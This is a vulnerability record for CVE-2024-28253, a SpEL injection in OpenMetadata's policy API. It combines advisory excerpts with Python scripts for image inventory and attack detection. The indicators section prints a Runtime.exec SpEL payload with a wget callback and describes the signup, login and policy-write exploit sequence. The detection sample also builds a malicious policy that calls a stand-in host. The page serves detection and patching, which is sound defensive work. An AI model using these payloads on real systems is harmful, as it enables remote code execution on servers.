CVE-2024-28253
Published: 2024-03-15
Priority: P1 (83) · High · CVSS 3.1 base score 8.8
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploitation: exploited in the wild (VulnCheck KEV); public exploit available
EPSS: 12.53% (95.7th percentile)
OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. `CompiledRule::validateExpression` is also called from `PolicyRepository.prepare`. `prepare()` is called from `EntityRepository.prepareInternal()` which, in turn, gets called from `EntityResource.createOrUpdate()`. Note that even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and therefore after the SpEL expression has been evaluated. In order to reach this method, an attacker can send a PUT request to `/api/v1/policies` which gets handled by `PolicyResource.createOrUpdate()`. This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query and is also tracked as `GHSL-2023-252`. This issue may lead to Remote Code Execution and has been addressed in version 1.3.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| open-metadata | openmetadata | < 1.3.1 | 1.3.1 |
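To turn the affected range above into a cluster inventory check, here is an added Python example (my own code, not the project's and not taken from any of the sources on this page). It walks the JSON that `kubectl get pods --all-namespaces -o json` returns, picks out containers whose image name contains "openmetadata", parses the tag and classifies each against the two fix versions the page cites (1.3.1 per NVD/GHSA, and 1.2.4 as the backport on the 1.2 branch per BleepingComputer). The embedded pod list is constructed sample data; the image names, registries and namespaces are assumptions, and `audit_cluster()` only works with kubectl and cluster read access.

```python
"""Inventory OpenMetadata images in a Kubernetes cluster and flag versions in
the range affected by CVE-2024-28253 (added example; constructed sample data)."""
import json
import re
import subprocess

TAG_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")
FIXED = (1, 3, 1)           # fix version per the NVD / GHSA entries
BRANCH_12_FIX = (1, 2, 4)   # backported fix on the 1.2 branch per BleepingComputer


def parse_version(image):
    """Return (major, minor, patch) from an image tag, or None if the image is
    untagged, pinned by digest, or carries a tag that is not a plain version."""
    _, sep, tag = image.rpartition(":")
    if not sep or "/" in tag:   # no tag, or the ':' belongs to a registry port
        return None
    m = TAG_RE.match(tag)
    return tuple(int(x) for x in m.groups()) if m else None


def classify(version):
    """Map a parsed version onto the page's two fix statements."""
    if version is None:
        return "unknown"                 # digest-pinned: resolve the tag manually
    if version >= FIXED:
        return "fixed"
    if BRANCH_12_FIX <= version < (1, 3, 0):
        return "patched-1.2-branch"      # 1.2.4+ carries the backport; 1.3.0 does not
    return "vulnerable"


def audit(pod_list):
    """Walk `kubectl get pods -o json` output and return one row per OpenMetadata
    container. The SpEL path lives in the server (openmetadata-service), but every
    openmetadata image is listed so nothing is missed."""
    rows = []
    for pod in pod_list.get("items", []):
        meta = pod.get("metadata", {})
        for c in pod.get("spec", {}).get("containers", []):
            image = c.get("image", "")
            if "openmetadata" not in image.lower():
                continue
            version = parse_version(image)
            rows.append({
                "namespace": meta.get("namespace"),
                "pod": meta.get("name"),
                "container": c.get("name"),
                "image": image,
                "version": version,
                "status": classify(version),
            })
    return rows


def audit_cluster():
    """Live variant: needs kubectl on PATH and cluster read access."""
    proc = subprocess.run(
        ["kubectl", "get", "pods", "--all-namespaces", "-o", "json"],
        check=True, capture_output=True, text=True,
    )
    return audit(json.loads(proc.stdout))


# Constructed sample in the real `kubectl get pods -o json` shape; names are assumptions.
SAMPLE_PODS = {"items": [
    {"metadata": {"name": "openmetadata-server-0", "namespace": "data"},
     "spec": {"containers": [{"name": "server", "image": "docker.getcollate.io/openmetadata/server:1.2.3"}]}},
    {"metadata": {"name": "openmetadata-server-1", "namespace": "data"},
     "spec": {"containers": [{"name": "server", "image": "docker.getcollate.io/openmetadata/server:1.3.0"}]}},
    {"metadata": {"name": "openmetadata-ingestion-0", "namespace": "data"},
     "spec": {"containers": [{"name": "ingestion", "image": "docker.getcollate.io/openmetadata/ingestion:1.3.1"}]}},
    {"metadata": {"name": "legacy-om", "namespace": "staging"},
     "spec": {"containers": [{"name": "server", "image": "registry.internal:5000/openmetadata/server:1.2.4"}]}},
    {"metadata": {"name": "pinned-om", "namespace": "staging"},
     "spec": {"containers": [{"name": "server", "image": "openmetadata/server@sha256:0123456789abcdef"}]}},
    {"metadata": {"name": "web", "namespace": "default"},
     "spec": {"containers": [{"name": "nginx", "image": "nginx:1.25"}]}},
]}

if __name__ == "__main__":
    for row in audit(SAMPLE_PODS):
        print(f"{row['status']:<20} {row['namespace']}/{row['pod']} {row['image']}")
```

Anything that comes back `unknown` is a digest-pinned or oddly tagged image and has to be resolved by hand; a 1.3.0 image is reported as vulnerable because the page's advisory names 1.3.1 as the fix on that branch.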
Detection & IOCs (extracted from sources)
- command (SpEL payload from the Nuclei template, with an interactsh callback substituted at run time): `T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('{{base64("wget http://{{interactsh-url}}")}}')))`
- other: Shodan query `http.favicon.hash:733091897`
- other: FOFA query `icon_hash="733091897"`
- Monitor PUT requests to /api/v1/policies whose rule 'condition' fields contain SpEL type references with Java runtime invocations (e.g. T(java.lang.Runtime).getRuntime().exec). The endpoint requires authentication, so the callers of interest are low-privilege or newly created accounts rather than anonymous clients.
- The exploit flow has three steps: (1) POST /api/v1/users/signup to register a new user, (2) POST /api/v1/users/login to obtain a Bearer token, (3) PUT /api/v1/policies with a malicious SpEL condition. Detect this sequence from a single source in HTTP logs.
- Correlate PUT /api/v1/policies requests (authenticated with 'Bearer <token>') with the age of the calling account; a policy write from an account registered moments earlier is a strong signal.
- Look for outbound DNS or HTTP callbacks (OAST/interactsh interactions) from OpenMetadata containers following PUT /api/v1/policies requests; a callback means the SpEL expression was evaluated, i.e. the RCE succeeded.
- In Kubernetes environments, enumerate OpenMetadata pods and check for image versions prior to 1.2.4/1.3.1, which are the actively exploited targets: kubectl get pods --all-namespaces -o=jsonpath='{range .items[*]}{.spec.containers[*].image}{"\n"}{end}' | grep 'openmetadata'
- Post-exploitation indicators include cron job creation for persistence, Netcat reverse-shell connections, and outbound connections to a remote server in China to download a cryptomining payload.
- The SpEL payload passes Base64-encoded commands to T(java.util.Base64).getDecoder().decode() inside the 'condition' field; alert on policy rule conditions containing 'T(java.' class references, and decode any embedded Base64 literal to recover the command.
- The authorization check (authorizer.authorize()) runs AFTER prepareInternal() and therefore after the SpEL expression has been evaluated, so any authenticated user, regardless of role, reaches the vulnerable code before authorization is enforced.
- The vulnerability affects OpenMetadata versions prior to 1.2.4 and 1.3.1: the NVD entry names 1.3.1 as the fix, while the BleepingComputer article states that patches shipped in 1.2.4 and newer. Confirm the patched version for your release branch.
- Account creation lowers the bar: where self-signup is enabled, an attacker can register via POST /api/v1/users/signup without prior credentials and log in to obtain a token; unchanged default credentials on a deployment are a second route to an authenticated session.
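The notes above describe a three-step request sequence and a payload shape. Here is an added Python example (my own code, not the project's and not from any of the cited sources) that implements both checks over a request log: it flags PUT /api/v1/policies bodies whose rule 'condition' contains SpEL type references, decodes the Base64 literal to recover the wrapped command, and correlates the write with a signup and login from the same source inside a time window. The JSON-per-line log format, the source addresses and the oast.example callback host are constructed sample data; reverse-proxy access logs rarely carry request bodies, so the body check assumes a WAF or application-level request log that does. Because only authenticated users reach the endpoint, a benign policy write from an established account must not fire, and the sample includes one to show that.

```python
"""Detection helpers for CVE-2024-28253 exploitation attempts (added example).

Two checks over a constructed JSON-per-line request log:
  1. SpEL type-reference abuse in policy rule 'condition' fields, with any
     Base64 literal passed to decode('...') decoded to expose the command;
  2. the signup -> login -> PUT /api/v1/policies sequence from one source.
"""
import base64
import json
import re
from datetime import datetime, timedelta

# 'T(java.' covers Runtime, ProcessBuilder and Base64 references; the rest catch
# payloads that reach the same calls without the fully qualified class name.
SPEL_MARKERS = re.compile(r"T\(\s*java\.|getRuntime\(\)|ProcessBuilder|\.exec\(|getDecoder\(\)")
B64_LITERAL = re.compile(r"decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")

SIGNUP = "/api/v1/users/signup"
LOGIN = "/api/v1/users/login"
POLICIES = "/api/v1/policies"


def decode_embedded_base64(condition):
    """Decode every Base64 literal handed to decode('...'); skip invalid ones."""
    out = []
    for literal in B64_LITERAL.findall(condition):
        try:
            out.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
    return out


def policy_conditions(body):
    """Extract rule conditions from a policy create/update body (JSON string)."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return []
    rules = doc.get("rules", []) if isinstance(doc, dict) else []
    return [r.get("condition") or "" for r in rules if isinstance(r, dict)]


def inspect_policy_request(body):
    """Return one finding per rule condition that carries a SpEL marker."""
    findings = []
    for cond in policy_conditions(body):
        if SPEL_MARKERS.search(cond):
            findings.append({"condition": cond, "decoded_payloads": decode_embedded_base64(cond)})
    return findings


def find_exploit_sequences(events, window=timedelta(minutes=10)):
    """Per source: remember signup/login, then judge each PUT /api/v1/policies.
    A hit needs either a SpEL payload or a signup within `window` of the write."""
    by_src = {}
    for ev in events:
        by_src.setdefault(ev["src"], []).append(ev)
    hits = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        signup_at = login_at = None
        for ev in evs:
            if ev["method"] == "POST" and ev["path"] == SIGNUP:
                signup_at = ev["ts"]
            elif ev["method"] == "POST" and ev["path"] == LOGIN:
                login_at = ev["ts"]
            elif ev["method"] == "PUT" and ev["path"] == POLICIES:
                spel = inspect_policy_request(ev.get("body"))
                fresh = bool(signup_at and login_at and ev["ts"] - signup_at <= window)
                if spel or fresh:
                    hits.append({"src": src, "ts": ev["ts"].isoformat(),
                                 "fresh_account": fresh, "spel": spel})
    return hits


def parse_log(lines):
    """Parse the constructed JSON-per-line log into event dicts with datetime ts."""
    events = []
    for line in lines:
        rec = json.loads(line)
        rec["ts"] = datetime.fromisoformat(rec["ts"])
        events.append(rec)
    return events


# Constructed sample data: a callback host, one attacker sequence, one benign admin write.
_B64 = base64.b64encode(b"wget http://oast.example/x").decode()
_MALICIOUS_POLICY = json.dumps({"name": "pwn", "rules": [{
    "name": "r1", "effect": "allow", "operations": ["All"], "resources": ["All"],
    "condition": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String("
                 f"T(java.util.Base64).getDecoder().decode('{_B64}')))"}]})
_BENIGN_POLICY = json.dumps({"name": "pii", "rules": [{
    "name": "r1", "effect": "deny", "operations": ["ViewAll"], "resources": ["table"],
    "condition": "matchAnyTag('PII.Sensitive')"}]})

SAMPLE_LOG = [
    json.dumps({"ts": "2024-04-10T12:00:00", "src": "10.0.0.5", "method": "POST", "path": SIGNUP}),
    json.dumps({"ts": "2024-04-10T12:00:05", "src": "10.0.0.5", "method": "POST", "path": LOGIN}),
    json.dumps({"ts": "2024-04-10T12:00:20", "src": "10.0.0.5", "method": "PUT", "path": POLICIES,
                "body": _MALICIOUS_POLICY}),
    json.dumps({"ts": "2024-04-10T09:00:00", "src": "10.0.0.7", "method": "POST", "path": LOGIN}),
    json.dumps({"ts": "2024-04-10T09:01:00", "src": "10.0.0.7", "method": "PUT", "path": POLICIES,
                "body": _BENIGN_POLICY}),
]

if __name__ == "__main__":
    for hit in find_exploit_sequences(parse_log(SAMPLE_LOG)):
        print(json.dumps(hit, indent=2))
```

The decoded payload is what you hand to the responder: in the sample it is the wget callback, in the campaign the page describes it would be the miner download. A write from an old account with a SpEL marker still fires on the payload alone, which matters because the attacker may already hold valid credentials.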
CVSS provenance
- NVD: v3.1 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- VulnCheck: 9.4 CRITICAL
GHSA
OpenMetadata vulnerable to SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)
ghsa · 2024-04-23 · CVE-2024-28253 · CRITICAL · CWE-94
### SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)
**Please note, only authenticated users have access to the PUT/POST APIs for /api/v1/policies. Non-authenticated users will not be able to access these APIs to exploit the vulnerability.**
`CompiledRule::validateExpression` is also called from [`PolicyRepository.prepare`](https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113)
```java
@Override
public void prepare(Policy policy, boolean update) {
  validateRules(policy);
}
...
public void validateRules(Policy policy) {
  List<Rule> rules = policy.getRules();
  if (nullOrEmpty(rules)) {
    throw new IllegalArgumentE
    // advisory excerpt is cut off at this point in the source
```
OSV
OpenMetadata vulnerable to SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)
osv · 2024-04-23 · CVE-2024-28253 · CRITICAL (advisory text and code excerpt identical to the GHSA entry above)
VulnCheck
OpenMetadata SpEL Injection in PUT /api/v1/policies
vulncheck · 2024 · CVSS 9.4 · CRITICAL · CVE-2024-28253
Affected: open-metadata/openmetadata < 1.3.1 (as in the Affected table above)
No detection rules found.
Nuclei
OpenMetaData - SpEL Injection in PUT /api/v1/policies
nuclei · CVSS 8.8 · HIGH · CVE-2024-28253
Wiz
Crying Out Cloud - May 2024 Newsletter | Wiz
blogs_wiz · 2024-05-06 · CVSS 10.0 · CRITICAL
## 🔎 Highlights
Architecture Risks that May Compromise AI-as-a-Service Providers
Wiz research recently performed a security audit of Hugging Face and discovered several security issues that would have allowed an actor running a specially-crafted malicious model on Hugging Face's infrastructure to achieve remote code execution and cross-tenant access to other customers' spaces or models. All these issues were remediated by Hugging Face and no customer action is required.
## 🐞 High Profile Vulnerabilities
DoS Vulnerability in HTTP/2 CONTINUATION Frames
Bleepingcomputer
Hackers hijack OpenMetadata apps in Kubernetes cryptomining attacks
blogs_bleepingcomputer · 2024-04-17 · CVSS 9.4 · CRITICAL
## Hackers hijack OpenMetadata apps in Kubernetes cryptomining attacks
By Sergiu Gatlan
In an ongoing Kubernetes cryptomining campaign, attackers target OpenMetadata workloads using critical remote code execution and authentication vulnerabilities.
OpenMetadata is an open-source metadata management platform that helps data engineers and scientists to catalog and discover data assets within their organization, including databases, tables, files, and services.
The security vulnerabilities exploited in these attacks ( CVE-2024-28255 , CVE-2024-28847 , CVE-2024-28253 , CVE-2024-28848 , and CVE-2024-28254 ) were reported on December 14 by GitHub Security Lab's Alvaro Muñoz and patched on January 5 in OpenMetadata versions 1.2.4 and newer.
According to Collate CTO and OpenMetadata project m
References
- https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection
- https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693
- https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219
- https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L365
- https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113
- https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-7vf4-x5m2-r6gr